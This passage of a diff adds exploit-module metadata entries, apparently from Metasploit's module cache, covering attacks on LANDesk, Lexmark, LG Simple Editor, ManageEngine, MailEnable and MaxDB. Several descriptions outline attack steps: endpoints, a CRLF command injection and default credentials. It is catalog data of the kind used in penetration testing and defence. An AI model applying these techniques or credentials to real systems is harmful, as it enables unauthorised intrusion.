false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/landesk_thinkmanagement_upload_asp": { + "name": "LANDesk Lenovo ThinkManagement Console Remote Command Execution", + "fullname": "exploit/windows/http/landesk_thinkmanagement_upload_asp", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-02-15", + "type": "exploit", + "author": [ + "Andrea Micalizzi", + "juan vazquez " + ], + "description": "This module can be used to execute a payload on LANDesk Lenovo\n ThinkManagement Suite 9.0.2 and 9.0.3.\n\n The payload is uploaded as an ASP script by sending a specially crafted\n SOAP request to \"/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx\"\n , via a \"RunAMTCommand\" operation with the command '-PutUpdateFileCore'\n as the argument.\n\n After execution, the ASP script with the payload is deleted by sending\n another specially crafted SOAP request to \"WSVulnerabilityCore/VulCore.asmx\"\n via a \"SetTaskLogByFile\" operation.", + "references": [ + "CVE-2012-1195", + "CVE-2012-1196", + "OSVDB-79276", + "OSVDB-79277", + "BID-52023", + "EDB-18622", + "EDB-18623" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb", + "is_install_path": true, + "ref_name": "windows/http/landesk_thinkmanagement_upload_asp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/lexmark_markvision_gfd_upload": { + "name": "Lexmark MarkVision Enterprise Arbitrary File Upload", + "fullname": "exploit/windows/http/lexmark_markvision_gfd_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-12-09", + "type": "exploit", + "author": [ + "Andrea Micalizzi", + "juan vazquez " + ], + "description": "This module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1.\n A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated\n attacker to upload arbitrary files, including arbitrary JSP code. This module has been\n tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.", + "references": [ + "CVE-2014-8741", + "ZDI-14-410", + "URL-http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US" + ], + "platform": "Windows", + "arch": "java", + "rport": 9788, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Lexmark Markvision Enterprise 2.0" + ], + "mod_time": "2021-02-17 12:33:59 +0000", + "path": "/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/lexmark_markvision_gfd_upload", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/lg_simple_editor_rce": { + "name": "LG Simple Editor Remote Code Execution", + "fullname": "exploit/windows/http/lg_simple_editor_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-08-24", + "type": "exploit", + "author": [ + "rgod", + "Ege Balcı " + ], + "description": "This Metasploit module exploits broken access control and directory traversal\n vulnerabilities in LG Simple Editor software for gaining code execution.\n The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.\n By exploiting this flaw, an attacker can upload and execute a malicious JSP\n payload with the SYSTEM user permissions.", + "references": [ + "ZDI-23-1204", + "CVE-2023-40498" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "LG Simple Editor <= v3.21" + ], + "mod_time": "2023-09-07 17:00:17 +0000", + "path": "/modules/exploits/windows/http/lg_simple_editor_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/lg_simple_editor_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/lg_simple_editor_rce_uploadvideo": { + "name": "LG Simple Editor Command Injection (CVE-2023-40504)", + "fullname": "exploit/windows/http/lg_simple_editor_rce_uploadvideo", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-08-04", + "type": "exploit", + "author": [ + "rgod", + "Michael Heinzl" + ], + "description": "Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.\n The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\\SYSTEM.", + "references": [ + "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-1208/", + "CVE-2023-40504" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows_Fetch" + ], + "mod_time": "2024-08-13 20:29:30 +0000", + "path": "/modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb", + "is_install_path": true, + "ref_name": "windows/http/lg_simple_editor_rce_uploadvideo", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/mailenable_auth_header": { + "name": "MailEnable Authorization Header Buffer Overflow", + "fullname": "exploit/windows/http/mailenable_auth_header", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-04-24", + "type": "exploit", + "author": [ + "David Maciejak " + ], + "description": "This module exploits a remote buffer overflow in the MailEnable web service.\n The vulnerability is triggered when a large value is placed into the Authorization\n header of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and\n MailEnable Professional versions prior to 1.55 are affected.", + "references": [ + "CVE-2005-1348", + "OSVDB-15913", + "OSVDB-15737", + "BID-13350", + "URL-http://www.nessus.org/plugins/index.php?view=single&id=18123" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "MEHTTPS.exe Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/mailenable_auth_header.rb", + "is_install_path": true, + "ref_name": "windows/http/mailenable_auth_header", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manage_engine_opmanager_rce": { + "name": "ManageEngine OpManager Remote Code Execution", + "fullname": "exploit/windows/http/manage_engine_opmanager_rce", + "aliases": [], + "rank": 0, + "disclosure_date": "2015-09-14", + "type": "exploit", + "author": [ + "xistence " + ], + "description": "This module exploits a default credential vulnerability in ManageEngine OpManager, where a\n default hidden account \"IntegrationUser\" with administrator privileges exists. The account\n has a default password of \"plugin\" which cannot be reset through the user interface. By\n log-in and abusing the default administrator's SQL query functionality, it's possible to\n write a WAR payload to disk and trigger an automatic deployment of this payload. This\n module has been tested successfully on OpManager v11.0 and v11.4-v11.6 for Windows.", + "references": [ + "EDB-38174", + "CVE-2015-7765", + "CVE-2015-7766", + "URL-https://seclists.org/fulldisclosure/2015/Sep/66", + "URL-https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability" + ], + "platform": "Java", + "arch": "java", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "ManageEngine OpManager <= v11.6" + ], + "mod_time": "2021-02-17 12:33:59 +0000", + "path": "/modules/exploits/windows/http/manage_engine_opmanager_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/manage_engine_opmanager_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/manageengine_adaudit_plus_authenticated_rce": { + "name": "ManageEngine ADAudit Plus Authenticated File Write RCE", + "fullname": "exploit/windows/http/manageengine_adaudit_plus_authenticated_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-10-01", + "type": "exploit", + "author": [ + "Moon", + "Erik Wynter" + ], + "description": "This module exploits security issues in ManageEngine ADAudit Plus\n prior to 7006 that allow authenticated users to execute arbitrary\n code by creating a custom alert profile and leveraging its custom\n alert script component.\n\n The module first runs a few checks to test the provided\n credentials, retrieve the configured domain(s) and obtain the\n build number of the target ADAudit Plus server.\n\n If the credentials are valid and the target is\n vulnerable, the module creates an alert profile that will be\n triggered for any failed login attempt to the configured domain.\n\n For versions prior to build 7004, the payload is directly inserted\n in the custom alert script component of the alert profile.\n\n For versions 7004 and 7005, the module leverages an arbitrary file\n write vulnerability (CVE-2021-42847) to create a Powershell script\n in the alert_scripts directory that contains the payload. The name\n of this script is then provided as the value for the custom alert\n script component of the alert profile.\n\n This module requires valid credentials for an account with the\n privileges to create alert scripts. It has been successfully tested\n against ManageEngine ADAudit Plus builds 7003 and 7005 running on\n Windows Server 2012 R2.\n\n Successful exploitation will result in RCE as the user running\n ManageEngine ADAudit Plus, which will typically be the local\n administrator.", + "references": [ + "CVE-2021-42847", + "URL-https://pitstop.manageengine.com/portal/en/community/topic/fix-released-for-a-vulnerability-in-manageengine-adaudit-plus", + "URL-https://www.manageengine.com/products/active-directory-audit/adaudit-plus-release-notes.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command" + ], + "mod_time": "2024-04-15 11:06:50 +0000", + "path": "/modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_adaudit_plus_authenticated_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "first-attempt-fail" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_adaudit_plus_cve_2022_28219": { + "name": "ManageEngine ADAudit Plus CVE-2022-28219", + "fullname": "exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-06-29", + "type": "exploit", + "author": [ + "Naveen Sunkavally", + "Ron Bowes" + ], + "description": "This module exploits CVE-2022-28219, which is a pair of\n vulnerabilities in ManageEngine ADAudit Plus versions before build\n 7060: a path traversal in the /cewolf endpoint, and a blind XXE in,\n to upload and execute an executable file.", + "references": [ + "CVE-2022-28219", + "URL-https://www.horizon3.ai/red-team-blog-cve-2022-28219/", + "URL-https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis", + "URL-https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command" + ], + "mod_time": "2024-09-05 08:49:32 +0000", + "path": "/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_adaudit_plus_cve_2022_28219", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection": { + "name": "ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection", + "fullname": "exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-04-12", + "type": "exploit", + "author": [ + "Simon Humbert", + "Dinh Hoang", + "Grant Willcox" + ], + "description": "ManageEngine ADManager Plus prior to build 7181 is vulnerable to an authenticated command injection due to insufficient\n validation of user input when performing the ChangePasswordAction function before passing it into a string that is later\n used as an OS command to execute.\n\n By making a POST request to /api/json/admin/saveServerSettings with a params POST\n parameter containing a JSON array object that has a USERNAME or PASSWORD element containing a\n carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user\n running ADManager Plus, which will typically be the local administrator.\n\n Note that the attacker must be authenticated in order to send requests to /api/json/admin/saveServerSettings,\n so this vulnerability does require authentication to exploit.\n\n As this exploit modifies the HTTP proxy settings for the entire server, one cannot use fetch payloads\n with this exploit, since these will use HTTP connections that will be affected by the change in configuration.", + "references": [ + "CVE-2023-29084", + "URL-https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/", + "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-438/", + "URL-https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html", + "URL-https://www.manageengine.com/products/ad-manager/release-notes.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command" + ], + "mod_time": "2023-06-01 16:59:14 +0000", + "path": "/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_adselfservice_plus_cve_2021_40539": { + "name": "ManageEngine ADSelfService Plus CVE-2021-40539", + "fullname": "exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-09-07", + "type": "exploit", + "author": [ + "Antoine Cervoise", + "Wilfried Bécard", + "mr_me", + "wvu " + ], + "description": "This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n started as a service.", + "references": [ + "CVE-2021-40539", + "URL-https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", + "URL-https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis", + "URL-https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", + "URL-https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py" + ], + "platform": "Java", + "arch": "java", + "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Java Dropper" + ], + "mod_time": "2021-11-24 10:40:32 +0000", + "path": "/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_adselfservice_plus_cve_2021_40539", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/manageengine_adselfservice_plus_cve_2022_28810": { + "name": "ManageEngine ADSelfService Plus Custom Script Execution", + "fullname": "exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-04-09", + "type": "exploit", + "author": [ + "Jake Baines", + "Hernan Diaz", + "Andrew Iwamaye", + "Dan Kelley" + ], + "description": "This module exploits the \"custom script\" feature of ADSelfService Plus. The\n feature was removed in build 6122 as part of the patch for CVE-2022-28810.\n For purposes of this module, a \"custom script\" is arbitrary operating system\n command execution.\n\n This module uses an attacker provided \"admin\" account to insert the malicious\n payload into the custom script fields. When a user resets their password or\n unlocks their account, the payload in the custom script will be executed.\n The payload will be executed as SYSTEM if ADSelfService Plus is installed as\n a service, which we believe is the normal operational behavior.\n\n This is a passive module because user interaction is required to trigger the\n payload. This module also does not automatically remove the malicious code from\n the remote target. Use the \"TARGET_RESET\" operation to remove the malicious\n custom script when you are done.\n\n ADSelfService Plus uses default credentials of \"admin\":\"admin\"", + "references": [ + "CVE-2022-28810", + "URL-https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html", + "URL-https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command" + ], + "mod_time": "2022-04-20 15:22:07 +0000", + "path": "/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_adselfservice_plus_cve_2022_28810", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_adshacluster_rce": { + "name": "ManageEngine Exchange Reporter Plus Unauthenticated RCE", + "fullname": "exploit/windows/http/manageengine_adshacluster_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-06-28", + "type": "exploit", + "author": [ + "Kacper Szurek " + ], + "description": "This module exploits a remote code execution vulnerability that\n exists in Exchange Reporter Plus <= 5310, caused by execution of\n bcp.exe file inside ADSHACluster servlet", + "references": [ + "URL-https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 8181, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2022-10-07 01:59:52 +0000", + "path": "/modules/exploits/windows/http/manageengine_adshacluster_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_adshacluster_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_appmanager_exec": { + "name": "ManageEngine Applications Manager Remote Code Execution", + "fullname": "exploit/windows/http/manageengine_appmanager_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-03-07", + "type": "exploit", + "author": [ + "Mehmet Ince " + ], + "description": "This module exploits command injection vulnerability in the ManageEngine Application Manager product.\n An unauthenticated user can execute a operating system command under the context of privileged user.\n\n Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials\n by accessing given system. This endpoint calls a several internal classes and then executes powershell script\n without validating user supplied parameter when the given system is OfficeSharePointServer.", + "references": [ + "CVE-2018-7890", + "BID-103358", + "URL-https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/", + "URL-https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/manageengine_appmanager_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_appmanager_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_apps_mngr": { + "name": "ManageEngine Applications Manager Authenticated Code Execution", + "fullname": "exploit/windows/http/manageengine_apps_mngr", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-04-08", + "type": "exploit", + "author": [ + "Jacob Giannantonio " + ], + "description": "This module logs into the Manage Engine Applications Manager to upload a\n payload to the file system and a batch script that executes the payload.", + "references": [ + "EDB-17152" + ], + "platform": "Windows", + "arch": "", + "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2018-08-20 18:08:19 +0000", + "path": "/modules/exploits/windows/http/manageengine_apps_mngr.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_apps_mngr", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_connectionid_write": { + "name": "ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability", + "fullname": "exploit/windows/http/manageengine_connectionid_write", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-12-14", + "type": "exploit", + "author": [ + "sinn3r " + ], + "description": "This module exploits a vulnerability found in ManageEngine Desktop Central 9. When\n uploading a 7z file, the FileUploadServlet class does not check the user-controlled\n ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to\n inject a null bye at the end of the value to create a malicious file with an arbitrary\n file type, and then place it under a directory that allows server-side scripts to run,\n which results in remote code execution under the context of SYSTEM.\n\n Please note that by default, some ManageEngine Desktop Central versions run on port 8020,\n but older ones run on port 8040. Also, using this exploit will leave debugging information\n produced by FileUploadServlet in file rdslog0.txt.\n\n This exploit was successfully tested on version 9, build 90109 and build 91084.", + "references": [ + "URL-https://www.rapid7.com/blog/post/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249", + "CVE-2015-8249" + ], + "platform": "Windows", + "arch": "", + "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "ManageEngine Desktop Central 9 on Windows" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/http/manageengine_connectionid_write.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_connectionid_write", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966": { + "name": "ManageEngine Endpoint Central Unauthenticated SAML RCE", + "fullname": "exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-01-10", + "type": "exploit", + "author": [ + "Khoa Dinh", + "horizon3ai", + "Christophe De La Fuente", + "h00die-gr3y " + ], + "description": "This exploits an unauthenticated remote code execution vulnerability\n that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10\n and below (CVE-2022-47966). Due to a dependency to an outdated library\n (Apache Santuario version 1.4.1), it is possible to execute arbitrary\n code by providing a crafted `samlResponse` XML to the Endpoint Central\n SAML endpoint. Note that the target is only vulnerable if it is\n configured with SAML-based SSO , and the service should be active.", + "references": [ + "CVE-2022-47966", + "URL-https://blog.viettelcybersecurity.com/saml-show-stopper/", + "URL-https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/", + "URL-https://github.com/horizon3ai/CVE-2022-47966", + "URL-https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis" + ], + "platform": "Java,Windows", + "arch": "", + "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Java (in-memory)", + "Windows EXE Dropper", + "Windows Command" + ], + "mod_time": "2024-06-14 12:05:12 +0000", + "path": "/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/manageengine_servicedesk_plus_cve_2021_44077": { + "name": "ManageEngine ServiceDesk Plus CVE-2021-44077", + "fullname": "exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-09-16", + "type": "exploit", + "author": [ + "wvu ", + "Y4er" + ], + "description": "This module exploits CVE-2021-44077, an unauthenticated remote code\n execution vulnerability in ManageEngine ServiceDesk Plus, to upload an\n EXE (msiexec.exe) and execute it as the SYSTEM account.\n\n Note that build 11305 is vulnerable to the authentication bypass but\n not the file upload. The module will check for an exploitable build.", + "references": [ + "CVE-2021-44077", + "URL-https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", + "URL-https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", + "URL-https://www.cisa.gov/uscert/ncas/alerts/aa21-336a", + "URL-https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/", + "URL-https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis", + "URL-https://xz.aliyun.com/t/10631" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Dropper" + ], + "mod_time": "2021-12-09 17:27:35 +0000", + "path": "/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_servicedesk_plus_cve_2021_44077", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/maxdb_webdbm_database": { + "name": "MaxDB WebDBM Database Parameter Overflow", + "fullname": "exploit/windows/http/maxdb_webdbm_database", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-08-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the MaxDB WebDBM\n service. By sending a specially-crafted HTTP request that contains\n an overly long database name. A remote attacker could overflow a buffer\n and execute arbitrary code on the system with privileges of the wahttp process.\n\n This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.", + "references": [ + "CVE-2006-4305", + "OSVDB-28300", + "BID-19660" + ], + "platform": "Windows", + "arch": "", + "rport": 9999, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MaxDB 7.6.00.16", + "MaxDB 7.6.00.27" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/maxdb_webdbm_database.rb", + "is_install_path": true, + "ref_name": "windows/http/maxdb_webdbm_database", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/maxdb_webdbm_get_overflow": { + "name": "MaxDB WebDBM GET Buffer Overflow", + "fullname": "exploit/windows/http/maxdb_webdbm_get_overflow", + "aliases": [], + "rank": 400, + "disclosure_date": "2005-04-26", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the MaxDB WebDBM\n service. This service is included with many recent versions\n of the MaxDB and SAPDB products. This particular module is\n capable of exploiting Windows systems through the use of an\n SEH frame overwrite. The offset to the SEH frame may change\n depending on where MaxDB has been installed, this module\n assumes a web root path with the same length as:\n\n C:\\Program Files\\sdb\\programs\\web\\Documents", + "references": [ + "CVE-2005-0684", + "OSVDB-15816", + "URL-http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities", + "BID-13368" + ], + "platform": "Windows", + "arch": "", + "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "MaxDB 7.5.00.11 / 7.5.00.24", + "Windows 2000 English", + "Windows XP English SP0/SP1", + "Windows 2003 English", + "Windows NT 4.0 SP4/SP5/SP6" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/maxdb_webdbm_get_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 